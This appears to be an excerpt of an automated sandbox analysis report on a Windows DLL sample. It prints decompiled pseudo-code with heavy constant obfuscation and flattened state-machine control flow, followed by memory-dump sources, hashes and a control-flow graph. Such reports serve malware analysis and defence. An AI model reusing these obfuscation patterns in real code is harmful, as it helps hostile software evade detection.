                          				_v300 = _v300 ^ 0xf07c3cef;
                          				_v300 = _v300 >> 2;
                          				_v300 = _v300 ^ 0x3c15b978;
                          				_v296 = 0xbc94b;
                          				_v296 = _v296 ^ 0xc913797f;
                          				_v296 = _v296 ^ 0xc91ffb85;
                          				_v304 = 0xeb47f;
                          				_v304 = _v304 * 0x21;
                          				_v304 = _v304 >> 9;
                          				_v304 = _v304 ^ 0x00079d5b;
                          				_v296 = 0x863d92;
                          				_v296 = _v296 | 0xc3fe325e;
                          				_v296 = _v296 ^ 0xc3f15d89;
                          				_v304 = 0x8c9292;
                          				_v304 = _v304 * 0x65;
                          				_v304 = _v304 * 0x2f;
                          				_v304 = _v304 ^ 0x2ea0d0e4;
                          				_v296 = 0x7998c8;
                          				_v296 = _v296 * 0x1f;
                          				_v296 = _v296 ^ 0x0ebe6fc9;
                          				_v304 = 0xc13eda;
                          				_v304 = _v304 + 0x239b;
                          				_v304 = _v304 | 0x8aa80eb1;
                          				_v304 = _v304 ^ 0x8ae5aa52;
                          				_v304 = 0x2ac635;
                          				_t965 = 3;
                          				_v304 = _v304 * 0x1a;
                          				_v304 = _v304 | 0xa2ccc89a;
                          				_v304 = _v304 ^ 0xa6da26ac;
                          				_v296 = 0xd161a;
                          				_v296 = _v296 >> 0xb;
                          				_v296 = _v296 ^ 0x00086437;
                          				_v300 = 0xc8d906;
                          				_v300 = _v300 << 5;
                          				_v300 = _v300 / _t965;
                          				_v300 = _v300 | 0xd3e5db7e;
                          				_v300 = _v300 ^ 0xdbffc0c3;
                          				_v304 = 0xa90eaa;
                          				_t966 = 0x62;
                          				_v304 = _v304 / _t966;
                          				_v304 = _v304 ^ 0xa321830c;
                          				_v304 = _v304 ^ 0xa32eb72c;
                          				_v296 = 0xc9c90e;
                          				_v296 = _v296 ^ 0x29ac5136;
                          				_v296 = _v296 ^ 0x296c2187;
                          				_v168 = 0xb8ba74;
                          				_v168 = _v168 >> 0xb;
                          				_v168 = _v168 | 0xd39b7801;
                          				_v168 = _v168 ^ 0xd39a1a13;
                          				_v240 = 0xce03d4;
                          				_v240 = _v240 + 0xffff6ba1;
                          				_v240 = _v240 + 0xffff3730;
                          				_t967 = 0x7e;
                          				_v240 = _v240 / _t967;
                          				_v240 = _v240 ^ 0x00015c8a;
                          				_v144 = 0x76dd98;
                          				_v144 = _v144 << 0xa;
                          				_t968 = 0xb;
                          				_v144 = _v144 / _t968;
                          				_v144 = _v144 ^ 0x13f9c089;
                          				_v88 = 0xd6758c;
                          				_t969 = 0x7c;
                          				_v88 = _v88 * 0x7d;
                          				_v88 = _v88 ^ 0x68b07bf0;
                          				_v112 = 0x136ce2;
                          				_v112 = _v112 * 0x7a;
                          				_v112 = _v112 ^ 0x094e8b6c;
                          				_v160 = 0xc781f4;
                          				_v160 = _v160 + 0x7b6;
                          				_v160 = _v160 ^ 0xd2a6870e;
                          				_v160 = _v160 ^ 0xd267b3cc;
                          				_v216 = 0x3cec52;
                          				_v216 = _v216 / _t969;
                          				_v216 = _v216 + 0xe7c2;
                          				_v216 = _v216 + 0x185f;
                          				_v216 = _v216 ^ 0x00083478;
                          				_v128 = 0xe8ace2;
                          				_v128 = _v128 + 0xffff5a4b;
                          				_v128 = _v128 >> 5;
                          				_v128 = _v128 ^ 0x00080537;
                          				_v20 = 0xba5f1f;
                          				_t970 = 0x28;
                          				_v20 = _v20 / _t970;
                          				_v20 = _v20 ^ 0x00097bc9;
                          				_v184 = 0x868bed;
                          				_v184 = _v184 ^ 0x5d9bbcc4;
                          				_t971 = 0x15;
                          				_t985 = 0x61;
                          				_v184 = _v184 * 0x7e;
                          				_v184 = _v184 ^ 0xd4635941;
                          				_v248 = 0xc6bb26;
                          				_v248 = _v248 + 0x4226;
                          				_v248 = _v248 + 0x1eaa;
                          				_v248 = _v248 + 0x143f;
                          				_v248 = _v248 ^ 0x00cd4d4f;
                          				_v124 = 0x1449aa;
                          				_v124 = _v124 >> 7;
                          				_v124 = _v124 + 0xffff4698;
                          				_v124 = _v124 ^ 0xfffccf45;
                          				_v204 = 0xd9ae2a;
                          				_v204 = _v204 * 0x25;
                          				_v204 = _v204 | 0x41acc33e;
                          				_v204 = _v204 + 0xe9b9;
                          				_v204 = _v204 ^ 0x5ff1a5de;
                          				_v104 = 0x27630a;
                          				_v104 = _v104 | 0x34992b3f;
                          				_v104 = _v104 ^ 0x34bda39f;
                          				_v28 = 0xa04064;
                          				_v28 = _v28 | 0x72e9e7d8;
                          				_v28 = _v28 ^ 0x72e1f0ab;
                          				_v48 = 0xc4ba01;
                          				_v48 = _v48 << 7;
                          				_v48 = _v48 ^ 0x6259539c;
                          				_v180 = 0x3340f4;
                          				_v180 = _v180 | 0x3035b2e2;
                          				_v180 = _v180 << 9;
                          				_v180 = _v180 ^ 0x6feb3ded;
                          				_v232 = 0x2e047a;
                          				_v232 = _v232 >> 0xa;
                          				_v232 = _v232 * 0x12;
                          				_v232 = _v232 / _t971;
                          				_v232 = _v232 ^ 0x0002c217;
                          				_v72 = 0x299f12;
                          				_v72 = _v72 << 3;
                          				_v72 = _v72 ^ 0x0148e07c;
                          				_v188 = 0xf414db;
                          				_v188 = _v188 << 0x10;
                          				_v188 = _v188 / _t985;
                          				_v188 = _v188 ^ 0x003bf194;
                          				_v156 = 0xc18fa7;
                          				_t986 = 0x6b;
                          				_v156 = _v156 / _t986;
                          				_t972 = 0xc;
                          				_v156 = _v156 / _t972;
                          				_v156 = _v156 ^ 0x0009860f;
                          				_v208 = 0xbb24e8;
                          				_v208 = _v208 + 0xd4bb;
                          				_v208 = _v208 + 0xffffec33;
                          				_t973 = 0x26;
                          				_v208 = _v208 / _t973;
                          				_v208 = _v208 ^ 0x000d494f;
                          				_v92 = 0xf4dbce;
                          				_v92 = _v92 + 0x5ee7;
                          				_v92 = _v92 ^ 0x00f22c8f;
                          				_v100 = 0x7239d1;
                          				_v100 = _v100 | 0x01f5add3;
                          				_v100 = _v100 ^ 0x01f71b27;
                          				_v292 = 0x4b72c4;
                          				_t974 = 0x61;
                          				_v292 = _v292 * 0xb;
                          				_v292 = _v292 + 0xfffff18f;
                          				_v292 = _v292 * 0xc;
                          				_v292 = _v292 ^ 0x26e66304;
                          				_v224 = 0xeae701;
                          				_v224 = _v224 << 1;
                          				_v224 = _v224 << 6;
                          				_v224 = _v224 | 0xd938d457;
                          				_v224 = _v224 ^ 0xfd70504c;
                          				_v108 = 0xa91a4c;
                          				_v108 = _v108 << 2;
                          				_v108 = _v108 ^ 0x02a24d10;
                          				_v68 = 0x46e95;
                          				_v68 = _v68 ^ 0x636abfcf;
                          				_v68 = _v68 ^ 0x636edf46;
                          				_v76 = 0x93e843;
                          				_v76 = _v76 | 0xba39a6db;
                          				_v76 = _v76 ^ 0xbaba9d8f;
                          				_v84 = 0xd50ea2;
                          				_v84 = _v84 | 0x50ec9d25;
                          				_v84 = _v84 ^ 0x50f8ba70;
                          				_v288 = 0x52484f;
                          				_v288 = _v288 + 0xb430;
                          				_v288 = _v288 * 0x4c;
                          				_v288 = _v288 >> 0xb;
                          				_v288 = _v288 ^ 0x000d4af8;
                          				_v284 = 0x2da3fa;
                          				_v284 = _v284 | 0xb3c63afe;
                          				_v284 = _v284 ^ 0xfce0d7d7;
                          				_v284 = _v284 + 0xffff4c41;
                          				_v284 = _v284 ^ 0x4f0e5b87;
                          				_v52 = 0xe252ad;
                          				_v52 = _v52 | 0x3c4f00b6;
                          				_v52 = _v52 ^ 0x3cecbbb2;
                          				_v60 = 0xab577e;
                          				_v60 = _v60 << 7;
                          				_v60 = _v60 ^ 0x55a8aa1a;
                          				_v148 = 0x5c065f;
                          				_v148 = _v148 << 0x10;
                          				_v148 = _v148 / _t986;
                          				_v148 = _v148 ^ 0x00079968;
                          				_v252 = 0xfb0d10;
                          				_v252 = _v252 / _t974;
                          				_v252 = _v252 << 0x10;
                          				_v252 = _v252 ^ 0x25f2b671;
                          				_v252 = _v252 ^ 0xb36c8d69;
                          				_v260 = 0x776100;
                          				_v260 = _v260 >> 0x10;
                          				_v260 = _v260 | 0xe8d0a90c;
                          				_v260 = _v260 * 0x14;
                          				_v260 = _v260 ^ 0x304a111f;
                          				_v268 = 0x4079f3;
                          				_v268 = _v268 >> 4;
                          				_t975 = 0x4f;
                          				_v268 = _v268 * 0x5f;
                          				_v268 = _v268 + 0x21c5;
                          				_v268 = _v268 ^ 0x017b7447;
                          				_v44 = 0x101fed;
                          				_v44 = _v44 ^ 0x1e85c214;
                          				_v44 = _v44 ^ 0x1e9d5cc7;
                          				_v140 = 0xb56248;
                          				_v140 = _v140 >> 0xb;
                          				_v140 = _v140 ^ 0xb0648700;
                          				_v140 = _v140 ^ 0xb06b52ff;
                          				_v228 = 0x5d2032;
                          				_v228 = _v228 + 0xe696;
                          				_v228 = _v228 + 0x90e;
                          				_v228 = _v228 << 6;
                          				_v228 = _v228 ^ 0x178d1a7f;
                          				_v192 = 0x46faa8;
                          				_v192 = _v192 / _t975;
                          				_v192 = _v192 + 0x59ff;
                          				_v192 = _v192 ^ 0x00002efb;
                          				_v272 = 0x13fbcb;
                          				_v272 = _v272 + 0xffff66dd;
                          				_v272 = _v272 * 0x5d;
                          				_v272 = _v272 + 0xffff70cc;
                          				_v272 = _v272 ^ 0x070467b9;
                          				_v136 = 0xda75c;
                          				_v136 = _v136 << 0xe;
                          				_v136 = _v136 << 8;
                          				_v136 = _v136 ^ 0xd703a46a;
                          				_v24 = 0x98e6;
                          				_v24 = _v24 | 0x30837cf6;
                          				_v24 = _v24 ^ 0x308cf6e6;
                          				_v196 = 0x2348e5;
                          				_v196 = _v196 + 0xec0b;
                          				_v196 = _v196 + 0xffff4f76;
                          				_v196 = _v196 + 0xffff4b3e;
                          				_v196 = _v196 ^ 0x002962b3;
                          				_v176 = 0x7bcaf7;
                          				_v176 = _v176 * 0x37;
                          				_v176 = _v176 << 4;
                          				_v176 = _v176 ^ 0xa986161e;
                          				_v120 = 0x3fa34;
                          				_v120 = _v120 * 0x49;
                          				_v120 = _v120 >> 7;
                          				_v120 = _v120 ^ 0x00066829;
                          				_v116 = 0x9c5c94;
                          				_v116 = _v116 + 0x20fd;
                          				_v116 = _v116 >> 2;
                          				_v116 = _v116 ^ 0x0025da20;
                          				_v212 = 0x6b8402;
                          				_v212 = _v212 + 0x9bc6;
                          				_v212 = _v212 * 0x74;
                          				_v212 = _v212 + 0xe621;
                          				_v212 = _v212 ^ 0x30fe6560;
                          				_v96 = 0xbe9741;
                          				_v96 = _v96 + 0xffffd77c;
                          				_v96 = _v96 ^ 0x00bbad9c;
                          				_v304 = 0xe465cf;
                          				_v304 = _v304 >> 4;
                          				_v304 = _v304 << 5;
                          				_v304 = _v304 ^ 0x01c3ad6d;
                          				_v296 = 0xc47264;
                          				_v296 = _v296 << 0xc;
                          				_v296 = _v296 ^ 0x4720cdbf;
                          				_v132 = 0x7ca780;
                          				_v132 = _v132 + 0xa093;
                          				_v132 = _v132 << 7;
                          				_v132 = _v132 ^ 0x3ea11d20;
                          				_t976 = _v8;
                          				_t987 = _v8;
                          				while(1) {
                          					L1:
                          					_t937 = 0xd154a5a;
                          					while(1) {
                          						_t846 = _v300;
                          						while(1) {
                          							L3:
                          							_t991 = _t978 - 0x7e00160;
                          							if(_t991 > 0) {
                          								break;
                          							}
                          							if(_t991 == 0) {
                          								_t978 = 0xfd2ad77;
                          								continue;
                          							} else {
                          								if(_t978 == 0x1a1d1c) {
                          									__eflags = E00D34BFC(_t976, _a16);
                          									_t978 = 0x6a5d586;
                          									_t866 = 1;
                          									_t874 =  !=  ? _t866 : _t874;
                          									goto L13;
                          								} else {
                          									if(_t978 == 0x352276a) {
                          										_t867 = E00D3DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
                          										_t987 = _t867;
                          										__eflags = _t867;
                          										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
                          										E00D52B09(_v160, 0, _v216, _v128);
                          										_t989 =  &(_t989[0xa]);
                          										L39:
                          										_t876 = _a28;
                          										_t937 = 0xd154a5a;
                          										goto L40;
                          									} else {
                          										if(_t978 == 0x6a5d586) {
                          											E00D4E358(_v196, _v176, _t976, _v120);
                          											_t978 = 0x6d75a8e;
                          											goto L12;
                          										} else {
                          											if(_t978 == 0x6d75a8e) {
                          												E00D4E358(_v116, _v212, _t846, _v96);
                          												_t978 = 0xedc04fb;
                          												L12:
                          												L13:
                          												_t876 = _a28;
                          												goto L1;
                          											} else {
                          												if(_t978 != 0x6fee97d) {
                          													L40:
                          													__eflags = _t978 - 0xb1727d5;
                          													if(_t978 != 0xb1727d5) {
                          														_t846 = _v300;
                          														continue;
                          													}
                          												} else {
                          													_t846 = E00D3ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
                          													_t876 = _a28;
                          													_t989 =  &(_t989[0xe]);
                          													_v300 = _t846;
                          													_t937 = 0xd154a5a;
                          													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
                          													continue;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							L43:
                          							return _t874;
                          						}
                          						__eflags = _t978 - _t937;
                          						if(_t978 == _t937) {
                          							__eflags =  *_t876;
                          							if(__eflags == 0) {
                          								_t847 = _v12;
                          							} else {
                          								_push(_v188);
                          								_push(_v72);
                          								_push(_v232);
                          								_t847 = E00D4E1F8(0xd31a0c, _v180, __eflags);
                          								_t989 =  &(_t989[3]);
                          								_v12 = _t847;
                          							}
                          							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
                          							_t980 = _a32 & 1;
                          							__eflags = _t980;
                          							if(_t980 != 0) {
                          								__eflags = _t946;
                          							}
                          							_t976 = E00D34A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
                          							E00D4FECB(_v12, _v68, _v76, _v84, _v288);
                          							_t989 =  &(_t989[0x10]);
                          							__eflags = _t976;
                          							if(_t976 == 0) {
                          								_t978 = 0x6d75a8e;
                          								goto L39;
                          							} else {
                          								_v36 = 1;
                          								E00D53E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
                          								_t989 =  &(_t989[5]);
                          								__eflags = _t980;
                          								if(_t980 != 0) {
                          									E00D4C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
                          									_t769 =  &_v36;
                          									 *_t769 = _v36 | _v236;
                          									__eflags =  *_t769;
                          									E00D53E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
                          									_t989 =  &(_t989[0xb]);
                          								}
                          								_t978 = 0xf81d281;
                          								goto L13;
                          							}
                          						} else {
                          							__eflags = _t978 - 0xdd5f83a;
                          							if(__eflags == 0) {
                          								__eflags = E00D3EF0C(_t976, _v80, __eflags) - _v40;
                          								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
                          								goto L13;
                          							} else {
                          								__eflags = _t978 - 0xedc04fb;
                          								if(_t978 == 0xedc04fb) {
                          									E00D4E358(_v304, _v296, _t987, _v132);
                          								} else {
                          									__eflags = _t978 - 0xf81d281;
                          									if(_t978 == 0xf81d281) {
                          										_t885 =  *_t876;
                          										__eflags = _t885;
                          										if(_t885 == 0) {
                          											_t861 = 0;
                          											__eflags = 0;
                          										} else {
                          											_t861 = _a28[1];
                          										}
                          										_push(_t885);
                          										E00D510DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
                          										_t989 =  &(_t989[7]);
                          										asm("sbb esi, esi");
                          										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
                          										goto L13;
                          									} else {
                          										__eflags = _t978 - 0xfd2ad77;
                          										if(_t978 != 0xfd2ad77) {
                          											goto L40;
                          										} else {
                          											_t978 = 0x352276a;
                          											goto L3;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						goto L43;
                          					}
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
                          • API String ID: 0-4090907037
                          • Opcode ID: 746d143d87de2caa746fbd8a9e0e72f52893b5679975fb0cae17dc166e4b2ff2
                          • Instruction ID: b8286730b30568bdce0a0092d63692eff4eeb6204eb48fd02b86561f3c90e09c
                          • Opcode Fuzzy Hash: 746d143d87de2caa746fbd8a9e0e72f52893b5679975fb0cae17dc166e4b2ff2
                          • Instruction Fuzzy Hash: 8792FDB1509381CFD3B9CF25C58AA8BBBE1BBC4308F10891DE5D996260D7B58949CF93
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 625 d4a474-d4aad7 626 d4aadf-d4aae5 625->626 627 d4ac11 626->627 628 d4aaeb-d4aaed 626->628 629 d4ac13-d4ac19 627->629 630 d4ac24-d4acfa call d31a34 call d4e1f8 call d52d0a call d4fecb call d485ff 628->630 631 d4aaf3-d4aaf5 628->631 629->626 633 d4ac1f 629->633 636 d4acfd-d4ad07 630->636 631->629 632 d4aafb-d4ac04 call d50db1 call d409dd call d3baa9 call d4e1f8 call d52d0a call d4fecb call d3bfbe 631->632 632->636 659 d4ac0a-d4ac0c 632->659 633->636 659->626
                          C-Code - Quality: 96%
                          			E00D4A474(void* __ecx) {
                          				char _v520;
                          				char _v1040;
                          				char _v1560;
                          				char _v2080;
                          				char _v2600;
                          				signed int _v2604;
                          				signed int _v2608;
                          				signed int _v2612;
                          				signed int _v2616;
                          				signed int _v2620;
                          				signed int _v2624;
                          				signed int _v2628;
                          				signed int _v2632;
                          				signed int _v2636;
                          				signed int _v2640;
                          				signed int _v2644;
                          				signed int _v2648;
                          				signed int _v2652;
                          				signed int _v2656;
                          				signed int _v2660;
                          				signed int _v2664;
                          				signed int _v2668;
                          				signed int _v2672;
                          				signed int _v2676;
                          				signed int _v2680;
                          				signed int _v2684;
                          				signed int _v2688;
                          				signed int _v2692;
                          				signed int _v2696;
                          				signed int _v2700;
                          				signed int _v2704;
                          				signed int _v2708;
                          				signed int _v2712;
                          				signed int _v2716;
                          				signed int _v2720;
                          				signed int _v2724;
                          				signed int _v2728;
                          				signed int _v2732;
                          				signed int _v2736;
                          				signed int _v2740;
                          				signed int _v2744;
                          				signed int _v2748;
                          				signed int _v2752;
                          				signed int _v2756;
                          				signed int _v2760;
                          				signed int _v2764;
                          				signed int _v2768;
                          				signed int _v2772;
                          				signed int _v2776;
                          				signed int _v2780;
                          				signed int _v2784;
                          				signed int _v2788;
                          				signed int _v2792;
                          				signed int _t422;
                          				signed int _t444;
                          				signed int _t445;
                          				signed int _t446;
                          				signed int _t447;
                          				signed int _t448;
                          				signed int _t449;
                          				void* _t487;
                          				void* _t488;
                          				signed int* _t492;
                          
                          				_t492 =  &_v2792;
                          				_t487 = __ecx;
                          				_v2736 = 0xa43fec;
                          				_v2736 = _v2736 + 0xffff66c9;
                          				_v2736 = _v2736 >> 0xc;
                          				_v2736 = _v2736 ^ 0x00000a13;
                          				_v2788 = 0xca245c;
                          				_v2788 = _v2788 + 0xc295;
                          				_v2788 = _v2788 << 6;
                          				_v2788 = _v2788 + 0xffff0e49;
                          				_v2788 = _v2788 ^ 0x32b58b6e;
                          				_v2660 = 0x35f9ef;
                          				_v2660 = _v2660 << 0xe;
                          				_v2660 = _v2660 ^ 0x7e7543bd;
                          				_v2688 = 0x437073;
                          				_v2688 = _v2688 >> 0xe;
                          				_v2688 = _v2688 ^ 0xf2a4f008;
                          				_v2688 = _v2688 ^ 0xf2aac2be;
                          				_v2700 = 0x2c6eea;
                          				_v2700 = _v2700 >> 1;
                          				_v2700 = _v2700 | 0x2b7eca56;
                          				_v2700 = _v2700 ^ 0x2b78a774;
                          				_v2676 = 0xafd7a5;
                          				_v2676 = _v2676 >> 0xb;
                          				_v2676 = _v2676 ^ 0x0002223f;
                          				_v2740 = 0x8278b2;
                          				_v2740 = _v2740 << 6;
                          				_v2740 = _v2740 << 1;
                          				_v2740 = _v2740 ^ 0x4136a23a;
                          				_v2612 = 0x7f4f91;
                          				_v2612 = _v2612 + 0xffff9116;
                          				_v2612 = _v2612 ^ 0x007102c2;
                          				_v2668 = 0x4461fd;
                          				_v2668 = _v2668 * 0x27;
                          				_v2668 = _v2668 ^ 0x0a629f7c;
                          				_t488 = 0x219adc7;
                          				_v2756 = 0xa77258;
                          				_v2756 = _v2756 >> 2;
                          				_v2756 = _v2756 + 0x9d81;
                          				_t444 = 0x54;
                          				_v2756 = _v2756 * 0x70;
                          				_v2756 = _v2756 ^ 0x12998c8c;
                          				_v2628 = 0x3fd810;
                          				_v2628 = _v2628 + 0xfffff92f;
                          				_v2628 = _v2628 ^ 0x003ee59a;
                          				_v2780 = 0x9fe7be;
                          				_v2780 = _v2780 + 0xaec4;
                          				_v2780 = _v2780 << 0x10;
                          				_v2780 = _v2780 >> 2;
                          				_v2780 = _v2780 ^ 0x25a64a78;
                          				_v2620 = 0xbf1dbc;
                          				_v2620 = _v2620 + 0xffff98cb;
                          				_v2620 = _v2620 ^ 0x00bd158d;
                          				_v2732 = 0xa8760d;
                          				_v2732 = _v2732 << 8;
                          				_v2732 = _v2732 + 0xa9d7;
                          				_v2732 = _v2732 ^ 0xa87dd804;
                          				_v2684 = 0xb5ab85;
                          				_v2684 = _v2684 / _t444;
                          				_v2684 = _v2684 ^ 0x0004fa7b;
                          				_v2708 = 0x9eabf6;
                          				_t445 = 0x4f;
                          				_v2708 = _v2708 / _t445;
                          				_v2708 = _v2708 ^ 0xed59372e;
                          				_v2708 = _v2708 ^ 0xed517486;
                          				_v2608 = 0x5ae525;
                          				_v2608 = _v2608 * 0x4c;
                          				_v2608 = _v2608 ^ 0x1afb43af;
                          				_v2644 = 0xaf8ee5;
                          				_v2644 = _v2644 ^ 0xf4d3cb8d;
                          				_v2644 = _v2644 ^ 0xf47b6f68;
                          				_v2604 = 0xc38975;
                          				_v2604 = _v2604 >> 0xf;
                          				_v2604 = _v2604 ^ 0x000b5702;
                          				_v2652 = 0x27ffed;
                          				_v2652 = _v2652 + 0x9a12;
                          				_v2652 = _v2652 ^ 0x002af41d;
                          				_v2616 = 0x7935fe;
                          				_v2616 = _v2616 + 0x1306;
                          				_v2616 = _v2616 ^ 0x007d2870;
                          				_v2692 = 0x7d1b3a;
                          				_t446 = 0x7d;
                          				_v2692 = _v2692 * 0x5a;
                          				_v2692 = _v2692 * 0x29;
                          				_v2692 = _v2692 ^ 0x0b423dcb;
                          				_v2724 = 0xbe8a04;
                          				_v2724 = _v2724 * 0x27;
                          				_v2724 = _v2724 | 0x44bf91fe;
                          				_v2724 = _v2724 ^ 0x5dbe7768;
                          				_v2636 = 0x66ae7e;
                          				_v2636 = _v2636 + 0xffff18a5;
                          				_v2636 = _v2636 ^ 0x006a6401;
                          				_v2744 = 0x24afb7;
                          				_v2744 = _v2744 + 0xf221;
                          				_v2744 = _v2744 >> 2;
                          				_v2744 = _v2744 ^ 0x00088a95;
                          				_v2716 = 0x4884b4;
                          				_v2716 = _v2716 | 0xbbb03a66;
                          				_v2716 = _v2716 ^ 0xe76b33e5;
                          				_v2716 = _v2716 ^ 0x5c9d38b7;
                          				_v2672 = 0xd2ae7f;
                          				_v2672 = _v2672 / _t446;
                          				_v2672 = _v2672 ^ 0x00034be9;
                          				_v2680 = 0x28809f;
                          				_v2680 = _v2680 << 8;
                          				_v2680 = _v2680 ^ 0x28858fb3;
                          				_v2720 = 0x2529a6;
                          				_t447 = 0x60;
                          				_v2720 = _v2720 / _t447;
                          				_t448 = 0x55;
                          				_v2720 = _v2720 / _t448;
                          				_v2720 = _v2720 ^ 0x00015f05;
                          				_v2728 = 0xe4ec68;
                          				_v2728 = _v2728 | 0x076980de;
                          				_v2728 = _v2728 >> 0x10;
                          				_v2728 = _v2728 ^ 0x00066f44;
                          				_v2764 = 0x25662b;
                          				_v2764 = _v2764 + 0x352e;
                          				_v2764 = _v2764 + 0xd238;
                          				_v2764 = _v2764 >> 9;
                          				_v2764 = _v2764 ^ 0x0003808d;
                          				_v2696 = 0xd79a4d;
                          				_v2696 = _v2696 >> 0xf;
                          				_v2696 = _v2696 | 0xe296257b;
                          				_v2696 = _v2696 ^ 0xe2941eeb;
                          				_v2704 = 0x8f07c6;
                          				_v2704 = _v2704 << 6;
                          				_v2704 = _v2704 << 0xb;
                          				_v2704 = _v2704 ^ 0x0f8cdb18;
                          				_v2772 = 0x165ad0;
                          				_v2772 = _v2772 * 0x45;
                          				_v2772 = _v2772 * 0xe;
                          				_v2772 = _v2772 | 0xc27a990b;
                          				_v2772 = _v2772 ^ 0xd67b0e5a;
                          				_v2712 = 0x3a0787;
                          				_v2712 = _v2712 << 9;
                          				_v2712 = _v2712 << 3;
                          				_v2712 = _v2712 ^ 0xa0756bb8;
                          				_v2768 = 0xd1f7d1;
                          				_v2768 = _v2768 ^ 0x28b4518a;
                          				_v2768 = _v2768 ^ 0x2c50bf5e;
                          				_v2768 = _v2768 << 1;
                          				_v2768 = _v2768 ^ 0x086bcac7;
                          				_v2664 = 0x43880;
                          				_v2664 = _v2664 << 2;
                          				_v2664 = _v2664 ^ 0x001745f4;
                          				_v2776 = 0x99bfba;
                          				_v2776 = _v2776 + 0xb20b;
                          				_v2776 = _v2776 ^ 0x9325107f;
                          				_v2776 = _v2776 ^ 0x1bb55bce;
                          				_v2776 = _v2776 ^ 0x880f35ab;
                          				_v2784 = 0xcf6f67;
                          				_v2784 = _v2784 | 0xe7eb8da5;
                          				_t449 = 0x69;
                          				_v2784 = _v2784 * 5;
                          				_v2784 = _v2784 >> 0xc;
                          				_v2784 = _v2784 ^ 0x000ae4cd;
                          				_v2792 = 0x938e6a;
                          				_v2792 = _v2792 * 0x34;
                          				_v2792 = _v2792 + 0xd82d;
                          				_v2792 = _v2792 + 0xffff3001;
                          				_v2792 = _v2792 ^ 0x1dfcfd52;
                          				_v2640 = 0x59feb;
                          				_v2640 = _v2640 + 0xffffbab8;
                          				_v2640 = _v2640 ^ 0x000de14c;
                          				_v2760 = 0x4f2f51;
                          				_v2760 = _v2760 << 3;
                          				_v2760 = _v2760 | 0xca7d0b31;
                          				_v2760 = _v2760 >> 5;
                          				_v2760 = _v2760 ^ 0x06504f0f;
                          				_v2648 = 0x12de1c;
                          				_v2648 = _v2648 << 2;
                          				_v2648 = _v2648 ^ 0x0044c65b;
                          				_v2656 = 0xedb7d1;
                          				_v2656 = _v2656 >> 0xe;
                          				_v2656 = _v2656 ^ 0x00060f5a;
                          				_v2624 = 0x25ed17;
                          				_v2624 = _v2624 << 8;
                          				_v2624 = _v2624 ^ 0x25e602f4;
                          				_v2632 = 0xdb105d;
                          				_v2632 = _v2632 + 0xbf07;
                          				_v2632 = _v2632 ^ 0x00d56ea2;
                          				_v2752 = 0xdb9922;
                          				_v2752 = _v2752 + 0xffff5c98;
                          				_t422 = _v2752 / _t449;
                          				_v2752 = _t422;
                          				_v2752 = _v2752 + 0xe0a7;
                          				_v2752 = _v2752 ^ 0x000f564b;
                          				_v2748 = 0x373105;
                          				_v2748 = _v2748 + 0xffff8875;
                          				_v2748 = _v2748 | 0xab9c3c2b;
                          				_v2748 = _v2748 ^ 0xabbdde7d;
                          				while(_t488 != 0x219adc7) {
                          					if(_t488 == 0x472b880) {
                          						E00D31A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
                          						_push(_v2712);
                          						_push(_v2772);
                          						_push(_v2704);
                          						E00D52D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0xd3192c,  &_v520,  &_v1040, E00D4E1F8(0xd3192c, _v2696, __eflags));
                          						E00D4FECB(_t424, _v2640, _v2760, _v2648, _v2656);
                          						__eflags = 0;
                          						return E00D485FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
                          					}
                          					_t500 = _t488 - 0x6430241;
                          					if(_t488 != 0x6430241) {
                          						L7:
                          						__eflags = _t488 - 0xc99ad3;
                          						if(__eflags != 0) {
                          							continue;
                          						} else {
                          							return _t422;
                          						}
                          						L10:
                          						return _t422;
                          					}
                          					E00D50DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
                          					 *((short*)(E00D409DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
                          					E00D3BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
                          					_push(_v2684);
                          					_push(_v2732);
                          					_push(_v2620);
                          					E00D52D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0xd3188c,  &_v2080,  &_v2600, E00D4E1F8(0xd3188c, _v2780, _t500));
                          					E00D4FECB(_t436, _v2616, _v2692, _v2724, _v2636);
                          					_t449 = _v2744;
                          					_t422 = E00D3BFBE( &_v2080, _t487, _v2716);
                          					_t492 =  &(_t492[0x18]);
                          					if(_t422 != 0) {
                          						_t488 = 0x472b880;
                          						continue;
                          					}
                          					goto L10;
                          				}
                          				_t488 = 0x6430241;
                          				goto L7;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
